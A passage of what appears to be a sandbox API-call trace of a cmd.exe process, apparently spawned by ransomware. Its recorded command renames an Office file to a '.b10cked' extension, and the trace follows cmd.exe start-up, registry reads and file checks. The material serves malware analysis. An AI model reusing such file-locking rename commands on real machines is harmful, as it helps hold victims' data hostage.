0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22387 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 22388 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22389 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22390 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 22391 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 22392 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 22393 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 22394 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 22395 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 22396 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 340 os_tid = 0xd58 [0162.340] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af9b4 | out: lpSystemTimeAsFileTime=0x1af9b4*(dwLowDateTime=0x9a228800, dwHighDateTime=0x1d440a9)) [0162.340] GetCurrentProcessId () returned 0xd94 [0162.340] GetCurrentThreadId () returned 0xd58 [0162.341] GetTickCount () returned 0x31360 [0162.341] QueryPerformanceCounter (in: lpPerformanceCount=0x1af9ac | out: lpPerformanceCount=0x1af9ac*=21912976426) returned 1 [0162.341] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0162.341] __set_app_type (_Type=0x1) [0162.341] __p__fmode () returned 0x76b331f4 [0162.341] __p__commode () returned 0x76b331fc [0162.341] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0162.342] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0162.342] GetCurrentThreadId () returned 0xd58 [0162.342] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd58) returned 0x38 [0162.342] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.342] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0162.342] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.342] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0162.342] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af944 | out: phkResult=0x1af944*=0x0) returned 0x2 [0162.342] VirtualQuery (in: lpAddress=0x1af97b, lpBuffer=0x1af914, dwLength=0x1c | out: lpBuffer=0x1af914*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.342] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1af914, dwLength=0x1c | out: lpBuffer=0x1af914*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0162.342] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1af914, dwLength=0x1c | out: lpBuffer=0x1af914*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0162.342] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1af914, dwLength=0x1c | out: lpBuffer=0x1af914*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.342] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1af914, dwLength=0x1c | out: lpBuffer=0x1af914*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0162.342] GetConsoleOutputCP () returned 0x1b5 [0162.343] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.343] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0162.343] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.343] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0162.343] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.343] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0162.343] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.343] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0162.343] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.343] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0162.343] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.344] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0162.344] GetEnvironmentStringsW () returned 0x350218* [0162.344] FreeEnvironmentStringsW (penv=0x350218) returned 1 [0162.344] GetEnvironmentStringsW () returned 0x350218* [0162.344] FreeEnvironmentStringsW (penv=0x350218) returned 1 [0162.344] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae8b4 | out: phkResult=0x1ae8b4*=0x40) returned 0x0 [0162.344] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x0, lpData=0x1ae8c0*=0xa8, lpcbData=0x1ae8b8*=0x1000) returned 0x2 [0162.344] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x4, lpData=0x1ae8c0*=0x1, lpcbData=0x1ae8b8*=0x4) returned 0x0 [0162.344] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x0, lpData=0x1ae8c0*=0x1, lpcbData=0x1ae8b8*=0x1000) returned 0x2 [0162.344] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x4, lpData=0x1ae8c0*=0x0, lpcbData=0x1ae8b8*=0x4) returned 0x0 [0162.344] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x4, lpData=0x1ae8c0*=0x40, lpcbData=0x1ae8b8*=0x4) returned 0x0 [0162.344] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x4, lpData=0x1ae8c0*=0x40, lpcbData=0x1ae8b8*=0x4) returned 0x0 [0162.344] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x0, lpData=0x1ae8c0*=0x40, lpcbData=0x1ae8b8*=0x1000) returned 0x2 [0162.345] RegCloseKey (hKey=0x40) returned 0x0 [0162.345] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae8b4 | out: phkResult=0x1ae8b4*=0x40) returned 0x0 [0162.345] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x0, lpData=0x1ae8c0*=0x40, lpcbData=0x1ae8b8*=0x1000) returned 0x2 [0162.345] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x4, lpData=0x1ae8c0*=0x1, lpcbData=0x1ae8b8*=0x4) returned 0x0 [0162.345] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x0, lpData=0x1ae8c0*=0x1, lpcbData=0x1ae8b8*=0x1000) returned 0x2 [0162.345] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x4, lpData=0x1ae8c0*=0x0, lpcbData=0x1ae8b8*=0x4) returned 0x0 [0162.345] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x4, lpData=0x1ae8c0*=0x9, lpcbData=0x1ae8b8*=0x4) returned 0x0 [0162.345] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x4, lpData=0x1ae8c0*=0x9, lpcbData=0x1ae8b8*=0x4) returned 0x0 [0162.345] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae8bc, lpData=0x1ae8c0, lpcbData=0x1ae8b8*=0x1000 | out: lpType=0x1ae8bc*=0x0, lpData=0x1ae8c0*=0x9, lpcbData=0x1ae8b8*=0x1000) returned 0x2 [0162.345] RegCloseKey (hKey=0x40) returned 0x0 [0162.345] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886384 [0162.345] srand (_Seed=0x5b886384) [0162.345] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked\"" [0162.345] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.REST.trx_dll.b10cked\"" [0162.345] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.346] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x351978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0162.346] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0162.346] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0162.346] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.346] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0162.346] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0162.346] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0162.346] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0162.346] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0162.346] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0162.346] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0162.346] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0162.346] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0162.346] GetEnvironmentStringsW () returned 0x352368* [0162.346] FreeEnvironmentStringsW (penv=0x352368) returned 1 [0162.346] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.346] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.346] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0162.346] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0162.346] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0162.346] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0162.347] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0162.347] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0162.347] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0162.347] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0162.347] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af680 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.347] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af680, lpFilePart=0x1af67c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af67c*="Desktop") returned 0x18 [0162.347] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.347] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af3fc | out: lpFindFileData=0x1af3fc) returned 0x3509f8 [0162.347] FindClose (in: hFindFile=0x3509f8 | out: hFindFile=0x3509f8) returned 1 [0162.347] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af3fc | out: lpFindFileData=0x1af3fc) returned 0x3509f8 [0162.347] FindClose (in: hFindFile=0x3509f8 | out: hFindFile=0x3509f8) returned 1 [0162.347] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af3fc | out: lpFindFileData=0x1af3fc) returned 0x3509f8 [0162.347] FindClose (in: hFindFile=0x3509f8 | out: hFindFile=0x3509f8) returned 1 [0162.348] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.348] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0162.348] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0162.348] GetEnvironmentStringsW () returned 0x350218* [0162.348] FreeEnvironmentStringsW (penv=0x350218) returned 1 [0162.348] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.348] GetConsoleOutputCP () returned 0x1b5 [0162.349] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.349] GetUserDefaultLCID () returned 0x409 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af7c0, cchData=128 | out: lpLCData="0") returned 2 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af7c0, cchData=128 | out: lpLCData="0") returned 2 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af7c0, cchData=128 | out: lpLCData="1") returned 2 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0162.349] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0162.350] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0162.350] GetConsoleTitleW (in: lpConsoleTitle=0x340938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.351] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.351] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0162.351] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0162.351] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0162.352] _wcsicmp (_String1="move", _String2=")") returned 68 [0162.352] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0162.352] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0162.352] _wcsicmp (_String1="IF", _String2="move") returned -4 [0162.352] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0162.352] _wcsicmp (_String1="REM", _String2="move") returned 5 [0162.352] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0162.356] GetConsoleTitleW (in: lpConsoleTitle=0x1af4b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.356] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0162.356] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0162.356] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0162.356] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0162.356] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0162.356] _wcsicmp (_String1="move", _String2="CD") returned 10 [0162.356] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0162.356] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0162.356] _wcsicmp (_String1="move", _String2="REN") returned -5 [0162.356] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0162.356] _wcsicmp (_String1="move", _String2="SET") returned -6 [0162.356] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0162.356] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0162.356] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0162.356] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0162.356] _wcsicmp (_String1="move", _String2="MD") returned 11 [0162.356] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0162.356] _wcsicmp (_String1="move", _String2="RD") returned -5 [0162.356] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0162.356] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0162.356] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0162.356] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0162.356] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0162.357] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0162.357] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0162.357] _wcsicmp (_String1="move", _String2="VER") returned -9 [0162.357] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0162.357] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0162.357] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0162.357] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0162.357] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0162.357] _wcsicmp (_String1="move", _String2="START") returned -6 [0162.357] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0162.357] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0162.357] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0162.497] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.497] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.497] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af274, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af26c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af26c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0162.498] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0162.499] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0162.499] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0162.499] _wcsicmp (_String1="XLINTL~2.TRX", _String2=".") returned 74 [0162.499] _wcsicmp (_String1="XLINTL~2.TRX", _String2="..") returned 74 [0162.499] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl~2.trx")) returned 0x2020 [0162.499] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x351f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.499] SetErrorMode (uMode=0x0) returned 0x0 [0162.499] SetErrorMode (uMode=0x1) returned 0x0 [0162.500] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x1aebfc, lpFilePart=0x1aebe4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX", lpFilePart=0x1aebe4*="XLINTL~2.TRX") returned 0x3c [0162.500] SetErrorMode (uMode=0x0) returned 0x1 [0162.500] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0162.500] _wcsicmp (_String1="XLINTL~2.TRX", _String2=".") returned 74 [0162.500] _wcsicmp (_String1="XLINTL~2.TRX", _String2="..") returned 74 [0162.500] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\xlintl~2.trx")) returned 0x2020 [0162.500] SetErrorMode (uMode=0x0) returned 0x0 [0162.500] SetErrorMode (uMode=0x1) returned 0x0 [0162.500] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x1af078, lpFilePart=0x1aee10 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~2.TRX", lpFilePart=0x1aee10*="XLINTL~2.TRX") returned 0x3c [0162.500] SetErrorMode (uMode=0x0) returned 0x1 [0162.500] 